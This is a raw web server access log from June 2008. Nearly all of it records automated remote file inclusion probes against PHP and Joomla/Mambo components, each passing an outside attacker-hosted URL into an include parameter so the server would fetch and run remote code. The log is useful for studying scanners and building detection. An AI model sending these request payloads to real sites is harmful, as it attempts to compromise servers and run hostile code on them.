64.150.164.61 - - [29/Jun/2008:18:58:32 -0600] "GET /logs//administrator/components/com_akobook/akobook.php?mosConfig_absolute_path=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.803"
8.2.208.2 - - [29/Jun/2008:18:58:46 -0600] "GET /logs/access_log.20080420//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 241 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
8.2.208.2 - - [29/Jun/2008:18:58:46 -0600] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 228 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
74.53.196.178 - - [29/Jun/2008:18:58:56 -0600] "GET /logs/access_log.20080511/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claro3g.freehostia.com/echo.txt? HTTP/1.1" 404 287 "-" "libwww-perl/5.811"
74.53.196.178 - - [29/Jun/2008:18:58:56 -0600] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claro3g.freehostia.com/echo.txt? HTTP/1.1" 404 267 "-" "libwww-perl/5.811"
74.53.196.178 - - [29/Jun/2008:18:58:56 -0600] "GET /logs/error_log.20080511/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claro3g.freehostia.com/echo.txt? HTTP/1.1" 404 286 "-" "libwww-perl/5.811"
8.2.208.2 - - [29/Jun/2008:18:59:04 -0600] "GET /logs/access_log.20080420//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 241 "-" "libwww-perl/5.76"
8.2.208.2 - - [29/Jun/2008:18:59:04 -0600] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 228 "-" "libwww-perl/5.76"
59.125.5.1 - - [29/Jun/2008:18:59:04 -0600] "GET //includes/header.php?c_temp_path=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 226 "-" "libwww-perl/5.65"
8.2.208.2 - - [29/Jun/2008:18:59:04 -0600] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 233 "-" "libwww-perl/5.76"
204.15.135.98 - - [29/Jun/2008:18:59:26 -0600] "GET /logs/error_log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://antoniodirenzo.altervista.org/ooid.txt?? HTTP/1.1" 404 264 "-" "libwww-perl/5.810"
204.15.135.98 - - [29/Jun/2008:18:59:26 -0600] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://antoniodirenzo.altervista.org/ooid.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.810"
204.15.135.98 - - [29/Jun/2008:18:59:27 -0600] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://antoniodirenzo.altervista.org/ooid.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.810"
64.106.202.240 - - [29/Jun/2008:19:00:14 -0600] "GET /logs/access_log//includes/ktedit/toolbar.php?dirDepth=http://210.60.110.116/board/id.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
64.106.202.240 - - [29/Jun/2008:19:00:15 -0600] "GET //includes/ktedit/toolbar.php?dirDepth=http://210.60.110.116/board/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
64.106.202.240 - - [29/Jun/2008:19:00:15 -0600] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://210.60.110.116/board/id.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.79"
64.106.202.240 - - [29/Jun/2008:19:00:16 -0600] "GET /logs/error_log//includes/ktedit/toolbar.php?dirDepth=http://210.60.110.116/board/id.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
211.93.112.42 - - [29/Jun/2008:19:00:20 -0600] "GET /logs/access_log.20080420/errors.php?error=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.65"
211.93.112.42 - - [29/Jun/2008:19:00:21 -0600] "GET /errors.php?error=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.65"
211.93.112.42 - - [29/Jun/2008:19:00:22 -0600] "GET /logs/errors.php?error=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.65"
211.93.112.42 - - [29/Jun/2008:19:00:29 -0600] "GET /logs/access_log.20080420//modules/vwar/admin/admin.php?vwar_root=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.65"
211.93.112.42 - - [29/Jun/2008:19:00:30 -0600] "GET //modules/vwar/admin/admin.php?vwar_root=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
211.93.112.42 - - [29/Jun/2008:19:00:31 -0600] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.65"
201.6.118.215 - - [29/Jun/2008:19:00:39 -0600] "GET /logs/access_log//include/admin.lib.inc.php?site_path=http://eskent.fileave/idnews.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
77.74.196.90 - - [29/Jun/2008:19:00:53 -0600] "GET /logs/access_log.20080615//components/com_simpleboard/file_upload.php?sbp=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 274 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
77.74.196.90 - - [29/Jun/2008:19:00:53 -0600] "GET //components/com_simpleboard/file_upload.php?sbp=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 249 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
8.2.208.2 - - [29/Jun/2008:19:01:02 -0600] "GET /logs/access_log.20080525//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 241 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
8.2.208.2 - - [29/Jun/2008:19:01:14 -0600] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 228 "-" "libwww-perl/5.76"
8.2.208.2 - - [29/Jun/2008:19:01:42 -0600] "GET /logs/access_log.20080601//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 241 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
8.2.208.2 - - [29/Jun/2008:19:01:42 -0600] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 228 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
67.18.241.90 - - [29/Jun/2008:19:01:44 -0600] "GET /logs/access_log.20080330//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.myonsitetrip.com/components/readme?? HTTP/1.1" 404 266 "-" "libwww-perl/5.812"
77.74.196.90 - - [29/Jun/2008:19:01:45 -0600] "GET /logs/access_log.20080615//components/com_simpleboard/file_upload.php?sbp=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.811"
77.74.196.90 - - [29/Jun/2008:19:01:45 -0600] "GET //components/com_simpleboard/file_upload.php?sbp=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
77.74.196.90 - - [29/Jun/2008:19:01:45 -0600] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
201.6.118.215 - - [29/Jun/2008:19:02:25 -0600] "GET /logs/error_log//include/lib.inc.php?site_path=http://eskent.fileave/idnews.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
201.6.118.215 - - [29/Jun/2008:19:02:26 -0600] "GET //include/lib.inc.php?site_path=http://eskent.fileave/idnews.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
201.6.118.215 - - [29/Jun/2008:19:02:26 -0600] "GET /logs//include/lib.inc.php?site_path=http://eskent.fileave/idnews.txt?? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
74.6.18.217 - - [29/Jun/2008:19:02:50 -0600] "GET /logs/error_log.20080615 HTTP/1.0" 200 6933777 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
193.202.88.113 - - [29/Jun/2008:19:02:54 -0600] "GET /logs/access_log.20080615//components/com_simpleboard/file_upload.php?sbp=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 274 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
193.202.88.113 - - [29/Jun/2008:19:02:55 -0600] "GET //components/com_simpleboard/file_upload.php?sbp=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 249 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
77.74.196.90 - - [29/Jun/2008:19:02:57 -0600] "GET //components/com_simpleboard/file_upload.php?sbp=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
64.106.202.240 - - [29/Jun/2008:19:03:15 -0600] "GET /logs/error_log.20080420//?mosConfig_absolute_path=http://210.60.110.116/board/id.txt?? HTTP/1.1" 404 231 "-" "libwww-perl/5.79"
217.221.183.132 - - [29/Jun/2008:19:03:30 -0600] "GET //include/lib.inc.php?site_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
8.2.208.2 - - [29/Jun/2008:19:03:53 -0600] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 228 "-" "libwww-perl/5.76"
8.2.208.2 - - [29/Jun/2008:19:04:02 -0600] "GET /logs/access_log.20080601//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 241 "-" "libwww-perl/5.76"
8.2.208.2 - - [29/Jun/2008:19:04:02 -0600] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 228 "-" "libwww-perl/5.76"
8.2.208.2 - - [29/Jun/2008:19:04:02 -0600] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 233 "-" "libwww-perl/5.76"
193.202.88.113 - - [29/Jun/2008:19:04:18 -0600] "GET /logs/access_log.20080615//components/com_simpleboard/file_upload.php?sbp=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.811"
193.202.88.113 - - [29/Jun/2008:19:04:18 -0600] "GET //components/com_simpleboard/file_upload.php?sbp=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
193.202.88.113 - - [29/Jun/2008:19:04:18 -0600] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
8.2.208.2 - - [29/Jun/2008:19:04:24 -0600] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 240 "-" "libwww-perl/5.76"
208.98.1.86 - - [29/Jun/2008:19:05:01 -0600] "GET /errors.php?error=http://www.goodimmo.com/xm/idpoi.txt???? HTTP/1.1" 404 228 "-" "libwww-perl/5.812"
208.98.1.86 - - [29/Jun/2008:19:05:01 -0600] "GET /logs/access_log/errors.php?error=http://www.goodimmo.com/xm/idpoi.txt???? HTTP/1.1" 404 232 "-" "libwww-perl/5.812"
208.98.1.86 - - [29/Jun/2008:19:05:02 -0600] "GET /logs/errors.php?error=http://www.goodimmo.com/xm/idpoi.txt???? HTTP/1.1" 404 233 "-" "libwww-perl/5.812"
77.74.196.90 - - [29/Jun/2008:19:05:10 -0600] "GET /logs/error_log.20080601//components/com_simpleboard/file_upload.php?sbp=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 273 "-" "libwww-perl/5.811"
202.221.143.111 - - [29/Jun/2008:19:05:15 -0600] "GET /logs/access_log/index.php?conteudo=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.65"
202.221.143.111 - - [29/Jun/2008:19:05:15 -0600] "GET /logs/index.php?conteudo=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.65"
202.221.143.111 - - [29/Jun/2008:19:05:47 -0600] "GET /logs/access_log.20080511/index.php?conteudo=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 240 "-" "libwww-perl/5.65"
193.202.88.113 - - [29/Jun/2008:19:05:53 -0600] "GET //components/com_simpleboard/file_upload.php?sbp=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
59.126.172.166 - - [29/Jun/2008:19:06:18 -0600] "GET /logs/access_log.20080330//administrator/components/com_akobook/akobook.php?mosConfig_absolute_path=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 280 "-" "libwww-perl/5.805"
59.126.172.166 - - [29/Jun/2008:19:06:19 -0600] "GET //administrator/components/com_akobook/akobook.php?mosConfig_absolute_path=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
59.126.172.166 - - [29/Jun/2008:19:06:20 -0600] "GET /logs//administrator/components/com_akobook/akobook.php?mosConfig_absolute_path=http://www.idols.m23.ru/id.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
8.2.208.2 - - [29/Jun/2008:19:06:38 -0600] "GET /logs/error_log.20080420//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 264 "-" "libwww-perl/5.76"
8.2.208.2 - - [29/Jun/2008:19:06:38 -0600] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 240 "-" "libwww-perl/5.76"
8.2.208.2 - - [29/Jun/2008:19:06:38 -0600] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 245 "-" "libwww-perl/5.76"
209.212.112.92 - - [29/Jun/2008:19:06:53 -0600] "GET /logs/access_log/errors.php?error=http://www.goodimmo.com/xm/idpoi.txt%0D?? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
209.212.112.92 - - [29/Jun/2008:19:06:53 -0600] "GET /errors.php?error=http://www.goodimmo.com/xm/idpoi.txt%0D?? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
209.212.112.92 - - [29/Jun/2008:19:06:53 -0600] "GET /logs/errors.php?error=http://www.goodimmo.com/xm/idpoi.txt%0D?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
211.93.112.42 - - [29/Jun/2008:19:06:58 -0600] "GET /logs/access_log//includes/ktedit/toolbar.php?dirDepth=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.65"
211.93.112.42 - - [29/Jun/2008:19:06:59 -0600] "GET //includes/ktedit/toolbar.php?dirDepth=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
211.93.112.42 - - [29/Jun/2008:19:07:00 -0600] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.65"
211.93.112.42 - - [29/Jun/2008:19:07:12 -0600] "GET /logs/error_log//includes/ktedit/toolbar.php?dirDepth=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.65"
77.74.196.90 - - [29/Jun/2008:19:07:27 -0600] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
77.74.196.90 - - [29/Jun/2008:19:07:27 -0600] "GET //components/com_simpleboard/file_upload.php?sbp=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
63.246.64.173 - - [29/Jun/2008:19:07:29 -0600] "GET /logs/error_log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 249 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
63.246.64.173 - - [29/Jun/2008:19:07:31 -0600] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 234 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
77.74.196.90 - - [29/Jun/2008:19:07:32 -0600] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
77.74.196.90 - - [29/Jun/2008:19:07:32 -0600] "GET //components/com_simpleboard/file_upload.php?sbp=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
77.74.196.90 - - [29/Jun/2008:19:08:03 -0600] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 230 "-" "libwww-perl/5.811"
8.2.208.2 - - [29/Jun/2008:19:08:04 -0600] "GET /logs/error_log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 255 "-" "libwww-perl/5.76"
217.20.163.130 - - [29/Jun/2008:19:08:08 -0600] "GET /logs/access_log.20080330//ashnews.php?pathtoashnews=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 243 "-" "libwww-perl/5.65"
217.20.163.130 - - [29/Jun/2008:19:08:08 -0600] "GET //ashnews.php?pathtoashnews=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 230 "-" "libwww-perl/5.65"
217.20.163.130 - - [29/Jun/2008:19:08:08 -0600] "GET /logs//ashnews.php?pathtoashnews=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
217.20.163.130 - - [29/Jun/2008:19:08:50 -0600] "GET /logs/access_log//ashnews.php?pathtoashnews=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
77.74.196.90 - - [29/Jun/2008:19:08:59 -0600] "GET /logs/access_log.20080406//newspublish/include.php?path%5Bdocroot%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.811"
77.74.196.90 - - [29/Jun/2008:19:08:59 -0600] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 230 "-" "libwww-perl/5.811"
77.74.196.90 - - [29/Jun/2008:19:09:00 -0600] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
216.75.35.118 - - [29/Jun/2008:19:09:17 -0600] "GET //header.php?tpl_pgb_moddir=http://www.delcorso.org/images/blank? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
217.20.163.130 - - [29/Jun/2008:19:09:47 -0600] "GET /logs/access_log.20080427/index2.php?x=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 241 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
217.20.163.130 - - [29/Jun/2008:19:09:47 -0600] "GET /index2.php?x=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
217.20.163.130 - - [29/Jun/2008:19:10:13 -0600] "GET /logs/access_log.20080601//atom.php5?page=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 241 "-" "libwww-perl/5.65"
217.20.163.130 - - [29/Jun/2008:19:10:13 -0600] "GET //atom.php5?page=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 216 "-" "libwww-perl/5.65"
217.20.163.130 - - [29/Jun/2008:19:10:14 -0600] "GET /logs//atom.php5?page=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 221 "-" "libwww-perl/5.65"
146.83.43.189 - - [29/Jun/2008:19:10:16 -0600] "GET /logs/access_log.20080420/index.php?option=http://www.mta.cl/phpform/use/coco.txt???? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
146.83.43.189 - - [29/Jun/2008:19:10:16 -0600] "GET /index.php?option=http://www.mta.cl/phpform/use/coco.txt???? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
146.83.43.189 - - [29/Jun/2008:19:10:17 -0600] "GET /logs/index.php?option=http://www.mta.cl/phpform/use/coco.txt???? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
193.202.88.113 - - [29/Jun/2008:19:10:27 -0600] "GET /logs/error_log.20080601//components/com_simpleboard/file_upload.php?sbp=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 273 "-" "libwww-perl/5.811"
217.20.163.130 - - [29/Jun/2008:19:10:40 -0600] "GET /logs/access_log.20080413//atom.php5?page=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 241 "-" "libwww-perl/5.65"
63.246.64.173 - - [29/Jun/2008:19:10:48 -0600] "GET /logs/access_log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 250 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
189.56.104.251 - - [29/Jun/2008:19:12:07 -0600] "GET /logs/access_log.20080615/index.php?body=http://heidik.org/canar/cmdaff? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
189.56.104.251 - - [29/Jun/2008:19:12:08 -0600] "GET /logs/index.php?body=http://heidik.org/canar/cmdaff? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
201.6.118.215 - - [29/Jun/2008:19:12:20 -0600] "GET /logs/access_log//include/lib.inc.php?site_path=http://eskent.fileave/idnews.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
189.19.255.240 - - [29/Jun/2008:19:12:25 -0600] "GET /logs/error_log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 279 "-" "libwww-perl/5.805"
189.19.255.240 - - [29/Jun/2008:19:12:29 -0600] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 264 "-" "libwww-perl/5.805"
189.19.255.240 - - [29/Jun/2008:19:12:29 -0600] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
211.93.112.42 - - [29/Jun/2008:19:12:55 -0600] "GET /logs/access_log.20080420//?mosConfig_absolute_path=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.65"
211.93.112.42 - - [29/Jun/2008:19:12:56 -0600] "GET //?mosConfig_absolute_path=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 200 698 "-" "libwww-perl/5.65"
211.93.112.42 - - [29/Jun/2008:19:12:57 -0600] "GET /logs//?mosConfig_absolute_path=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 200 4297 "-" "libwww-perl/5.65"
217.20.163.130 - - [29/Jun/2008:19:12:58 -0600] "GET /logs/access_log/index2.php?x=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.65"
217.20.163.130 - - [29/Jun/2008:19:12:58 -0600] "GET /index2.php?x=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.65"
217.20.163.130 - - [29/Jun/2008:19:12:58 -0600] "GET /logs/index2.php?x=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.65"
193.202.88.113 - - [29/Jun/2008:19:13:07 -0600] "GET /logs/error_log.20080420//modules/vwar/admin/admin.php?vwar_root=http://www.stanipanikolektiv.com/components/.apache/kaka.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.811"
217.20.163.130 - - [29/Jun/2008:19:13:10 -0600] "GET /index2.php?x=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.65"
217.20.163.130 - - [29/Jun/2008:19:13:27 -0600] "GET /logs/access_log.20080615/index2.php?x=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.65"
217.20.163.130 - - [29/Jun/2008:19:14:04 -0600] "GET /logs/access_log.20080406//newspublish/include.php?path%5Bdocroot%5D=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.65"
217.20.163.130 - - [29/Jun/2008:19:14:05 -0600] "GET //newspublish/include.php?path%5Bdocroot%5D=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 230 "-" "libwww-perl/5.65"
217.20.163.130 - - [29/Jun/2008:19:14:05 -0600] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
217.20.163.130 - - [29/Jun/2008:19:14:06 -0600] "GET //atom.php5?page=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 216 "-" "libwww-perl/5.65"
217.20.163.130 - - [29/Jun/2008:19:14:10 -0600] "GET //ashnews.php?pathtoashnews=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 230 "-" "libwww-perl/5.65"
63.246.64.173 - - [29/Jun/2008:19:14:48 -0600] "GET /logs/error_log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.65"
63.246.64.173 - - [29/Jun/2008:19:14:48 -0600] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
63.246.64.173 - - [29/Jun/2008:19:15:02 -0600] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.65"
205.234.186.154 - - [29/Jun/2008:19:15:28 -0600] "GET /index.php?option=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.810"
217.20.163.130 - - [29/Jun/2008:19:15:56 -0600] "GET /logs/access_log.20080413/akocomments.php?mosConfig_absolute_path=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.65"
217.20.163.130 - - [29/Jun/2008:19:15:56 -0600] "GET /akocomments.php?mosConfig_absolute_path=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.65"
217.20.163.130 - - [29/Jun/2008:19:15:56 -0600] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.65"
77.74.196.90 - - [29/Jun/2008:19:15:57 -0600] "GET /logs/error_log.20080420//newspublish/include.php?path%5Bdocroot%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
217.20.163.130 - - [29/Jun/2008:19:17:01 -0600] "GET //newspublish/include.php?path%5Bdocroot%5D=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 230 "-" "libwww-perl/5.65"
189.56.104.251 - - [29/Jun/2008:19:18:02 -0600] "GET /logs/access_log.20080504/index.php?body=http://heidik.org/canar/cmdaff? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
217.20.163.130 - - [29/Jun/2008:19:18:03 -0600] "GET /akocomments.php?mosConfig_absolute_path=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.65"
189.19.255.240 - - [29/Jun/2008:19:18:51 -0600] "GET /logs/access_log.20080427/index2.php?x=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 241 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
